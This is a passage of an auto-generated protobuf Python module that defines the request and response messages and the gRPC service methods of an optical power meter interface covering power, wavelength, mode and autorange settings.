name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthRequest.units', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=948,
serialized_end=999,
)
_GETWAVELENGTHRESPONSE = _descriptor.Descriptor(
name='GetWavelengthResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1001,
serialized_end=1072,
)
_SETWAVELENGTHREQUEST = _descriptor.Descriptor(
name='SetWavelengthRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthRequest.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthRequest.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1074,
serialized_end=1144,
)
_SETWAVELENGTHRESPONSE = _descriptor.Descriptor(
name='SetWavelengthResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1146,
serialized_end=1217,
)
_GETMODEREQUEST = _descriptor.Descriptor(
name='GetModeRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetModeRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetModeRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetModeRequest.units', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1219,
serialized_end=1264,
)
_GETMODERESPONSE = _descriptor.Descriptor(
name='GetModeResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetModeResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetModeResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetModeResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetModeResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1266,
serialized_end=1331,
)
_SETMODEREQUEST = _descriptor.Descriptor(
name='SetModeRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetModeRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetModeRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetModeRequest.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetModeRequest.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1333,
serialized_end=1397,
)
_SETMODERESPONSE = _descriptor.Descriptor(
name='SetModeResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetModeResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetModeResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetModeResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetModeResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1399,
serialized_end=1464,
)
_GETAUTORANGEREQUEST = _descriptor.Descriptor(
name='GetAutorangeRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeRequest.units', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1466,
serialized_end=1516,
)
_GETAUTORANGERESPONSE = _descriptor.Descriptor(
name='GetAutorangeResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1518,
serialized_end=1588,
)
_SETAUTORANGEREQUEST = _descriptor.Descriptor(
name='SetAutorangeRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeRequest.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeRequest.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1590,
serialized_end=1659,
)
_SETAUTORANGERESPONSE = _descriptor.Descriptor(
name='SetAutorangeResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1661,
serialized_end=1731,
)
_INITIALIZEREQUEST_PROPERTIESENTRY.containing_type = _INITIALIZEREQUEST
_INITIALIZEREQUEST.fields_by_name['properties'].message_type = _INITIALIZEREQUEST_PROPERTIESENTRY
DESCRIPTOR.message_types_by_name['InitializeRequest'] = _INITIALIZEREQUEST
DESCRIPTOR.message_types_by_name['InitializeResponse'] = _INITIALIZERESPONSE
DESCRIPTOR.message_types_by_name['ShutdownRequest'] = _SHUTDOWNREQUEST
DESCRIPTOR.message_types_by_name['ShutdownResponse'] = _SHUTDOWNRESPONSE
DESCRIPTOR.message_types_by_name['GetPowerRequest'] = _GETPOWERREQUEST
DESCRIPTOR.message_types_by_name['GetPowerResponse'] = _GETPOWERRESPONSE
DESCRIPTOR.message_types_by_name['SetPowerRequest'] = _SETPOWERREQUEST
DESCRIPTOR.message_types_by_name['SetPowerResponse'] = _SETPOWERRESPONSE
DESCRIPTOR.message_types_by_name['GetCountRequest'] = _GETCOUNTREQUEST
DESCRIPTOR.message_types_by_name['GetCountResponse'] = _GETCOUNTRESPONSE
DESCRIPTOR.message_types_by_name['SetCountRequest'] = _SETCOUNTREQUEST
DESCRIPTOR.message_types_by_name['SetCountResponse'] = _SETCOUNTRESPONSE
DESCRIPTOR.message_types_by_name['GetWavelengthRequest'] = _GETWAVELENGTHREQUEST
DESCRIPTOR.message_types_by_name['GetWavelengthResponse'] = _GETWAVELENGTHRESPONSE
DESCRIPTOR.message_types_by_name['SetWavelengthRequest'] = _SETWAVELENGTHREQUEST
DESCRIPTOR.message_types_by_name['SetWavelengthResponse'] = _SETWAVELENGTHRESPONSE
DESCRIPTOR.message_types_by_name['GetModeRequest'] = _GETMODEREQUEST
DESCRIPTOR.message_types_by_name['GetModeResponse'] = _GETMODERESPONSE
DESCRIPTOR.message_types_by_name['SetModeRequest'] = _SETMODEREQUEST
DESCRIPTOR.message_types_by_name['SetModeResponse'] = _SETMODERESPONSE
DESCRIPTOR.message_types_by_name['GetAutorangeRequest'] = _GETAUTORANGEREQUEST
DESCRIPTOR.message_types_by_name['GetAutorangeResponse'] = _GETAUTORANGERESPONSE
DESCRIPTOR.message_types_by_name['SetAutorangeRequest'] = _SETAUTORANGEREQUEST
DESCRIPTOR.message_types_by_name['SetAutorangeResponse'] = _SETAUTORANGERESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
InitializeRequest = _reflection.GeneratedProtocolMessageType('InitializeRequest', (_message.Message,), dict(
PropertiesEntry = _reflection.GeneratedProtocolMessageType('PropertiesEntry', (_message.Message,), dict(
DESCRIPTOR = _INITIALIZEREQUEST_PROPERTIESENTRY,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest.PropertiesEntry)
))
,
DESCRIPTOR = _INITIALIZEREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest)
))
_sym_db.RegisterMessage(InitializeRequest)
_sym_db.RegisterMessage(InitializeRequest.PropertiesEntry)
InitializeResponse = _reflection.GeneratedProtocolMessageType('InitializeResponse', (_message.Message,), dict(
DESCRIPTOR = _INITIALIZERESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.InitializeResponse)
))
_sym_db.RegisterMessage(InitializeResponse)
ShutdownRequest = _reflection.GeneratedProtocolMessageType('ShutdownRequest', (_message.Message,), dict(
DESCRIPTOR = _SHUTDOWNREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.ShutdownRequest)
))
_sym_db.RegisterMessage(ShutdownRequest)
ShutdownResponse = _reflection.GeneratedProtocolMessageType('ShutdownResponse', (_message.Message,), dict(
DESCRIPTOR = _SHUTDOWNRESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.ShutdownResponse)
))
_sym_db.RegisterMessage(ShutdownResponse)
GetPowerRequest = _reflection.GeneratedProtocolMessageType('GetPowerRequest', (_message.Message,), dict(
DESCRIPTOR = _GETPOWERREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerRequest)
))
_sym_db.RegisterMessage(GetPowerRequest)
GetPowerResponse = _reflection.GeneratedProtocolMessageType('GetPowerResponse', (_message.Message,), dict(
DESCRIPTOR = _GETPOWERRESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerResponse)
))
_sym_db.RegisterMessage(GetPowerResponse)
SetPowerRequest = _reflection.GeneratedProtocolMessageType('SetPowerRequest', (_message.Message,), dict(
DESCRIPTOR = _SETPOWERREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerRequest)
))
_sym_db.RegisterMessage(SetPowerRequest)
SetPowerResponse = _reflection.GeneratedProtocolMessageType('SetPowerResponse', (_message.Message,), dict(
DESCRIPTOR = _SETPOWERRESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerResponse)
))
_sym_db.RegisterMessage(SetPowerResponse)
GetCountRequest = _reflection.GeneratedProtocolMessageType('GetCountRequest', (_message.Message,), dict(
DESCRIPTOR = _GETCOUNTREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetCountRequest)
))
_sym_db.RegisterMessage(GetCountRequest)
GetCountResponse = _reflection.GeneratedProtocolMessageType('GetCountResponse', (_message.Message,), dict(
DESCRIPTOR = _GETCOUNTRESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetCountResponse)
))
_sym_db.RegisterMessage(GetCountResponse)
SetCountRequest = _reflection.GeneratedProtocolMessageType('SetCountRequest', (_message.Message,), dict(
DESCRIPTOR = _SETCOUNTREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetCountRequest)
))
_sym_db.RegisterMessage(SetCountRequest)
SetCountResponse = _reflection.GeneratedProtocolMessageType('SetCountResponse', (_message.Message,), dict(
DESCRIPTOR = _SETCOUNTRESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetCountResponse)
))
_sym_db.RegisterMessage(SetCountResponse)
GetWavelengthRequest = _reflection.GeneratedProtocolMessageType('GetWavelengthRequest', (_message.Message,), dict(
DESCRIPTOR = _GETWAVELENGTHREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthRequest)
))
_sym_db.RegisterMessage(GetWavelengthRequest)
GetWavelengthResponse = _reflection.GeneratedProtocolMessageType('GetWavelengthResponse', (_message.Message,), dict(
DESCRIPTOR = _GETWAVELENGTHRESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthResponse)
))
_sym_db.RegisterMessage(GetWavelengthResponse)
SetWavelengthRequest = _reflection.GeneratedProtocolMessageType('SetWavelengthRequest', (_message.Message,), dict(
DESCRIPTOR = _SETWAVELENGTHREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthRequest)
))
_sym_db.RegisterMessage(SetWavelengthRequest)
SetWavelengthResponse = _reflection.GeneratedProtocolMessageType('SetWavelengthResponse', (_message.Message,), dict(
DESCRIPTOR = _SETWAVELENGTHRESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthResponse)
))
_sym_db.RegisterMessage(SetWavelengthResponse)
GetModeRequest = _reflection.GeneratedProtocolMessageType('GetModeRequest', (_message.Message,), dict(
DESCRIPTOR = _GETMODEREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetModeRequest)
))
_sym_db.RegisterMessage(GetModeRequest)
GetModeResponse = _reflection.GeneratedProtocolMessageType('GetModeResponse', (_message.Message,), dict(
DESCRIPTOR = _GETMODERESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetModeResponse)
))
_sym_db.RegisterMessage(GetModeResponse)
SetModeRequest = _reflection.GeneratedProtocolMessageType('SetModeRequest', (_message.Message,), dict(
DESCRIPTOR = _SETMODEREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetModeRequest)
))
_sym_db.RegisterMessage(SetModeRequest)
SetModeResponse = _reflection.GeneratedProtocolMessageType('SetModeResponse', (_message.Message,), dict(
DESCRIPTOR = _SETMODERESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetModeResponse)
))
_sym_db.RegisterMessage(SetModeResponse)
GetAutorangeRequest = _reflection.GeneratedProtocolMessageType('GetAutorangeRequest', (_message.Message,), dict(
DESCRIPTOR = _GETAUTORANGEREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeRequest)
))
_sym_db.RegisterMessage(GetAutorangeRequest)
GetAutorangeResponse = _reflection.GeneratedProtocolMessageType('GetAutorangeResponse', (_message.Message,), dict(
DESCRIPTOR = _GETAUTORANGERESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeResponse)
))
_sym_db.RegisterMessage(GetAutorangeResponse)
SetAutorangeRequest = _reflection.GeneratedProtocolMessageType('SetAutorangeRequest', (_message.Message,), dict(
DESCRIPTOR = _SETAUTORANGEREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeRequest)
))
_sym_db.RegisterMessage(SetAutorangeRequest)
SetAutorangeResponse = _reflection.GeneratedProtocolMessageType('SetAutorangeResponse', (_message.Message,), dict(
DESCRIPTOR = _SETAUTORANGERESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeResponse)
))
_sym_db.RegisterMessage(SetAutorangeResponse)
_INITIALIZEREQUEST_PROPERTIESENTRY._options = None
_POWERMETER = _descriptor.ServiceDescriptor(
name='PowerMeter',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter',
file=DESCRIPTOR,
index=0,
serialized_options=None,
serialized_start=1734,
serialized_end=3696,
methods=[
_descriptor.MethodDescriptor(
name='Initialize',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.Initialize',
index=0,
containing_service=None,
input_type=_INITIALIZEREQUEST,
output_type=_INITIALIZERESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='Shutdown',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.Shutdown',
index=1,
containing_service=None,
input_type=_SHUTDOWNREQUEST,
output_type=_SHUTDOWNRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='GetPower',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.GetPower',
index=2,
containing_service=None,
input_type=_GETPOWERREQUEST,
output_type=_GETPOWERRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='SetPower',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.SetPower',
index=3,
containing_service=None,
input_type=_SETPOWERREQUEST,
output_type=_SETPOWERRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='GetCount',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.GetCount',
index=4,
containing_service=None,
input_type=_GETCOUNTREQUEST,
output_type=_GETCOUNTRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='SetCount',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.SetCount',
index=5,
containing_service=None,
input_type=_SETCOUNTREQUEST,
output_type=_SETCOUNTRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='GetWavelength',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.GetWavelength',
index=6,
containing_service=None,
input_type=_GETWAVELENGTHREQUEST,
output_type=_GETWAVELENGTHRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
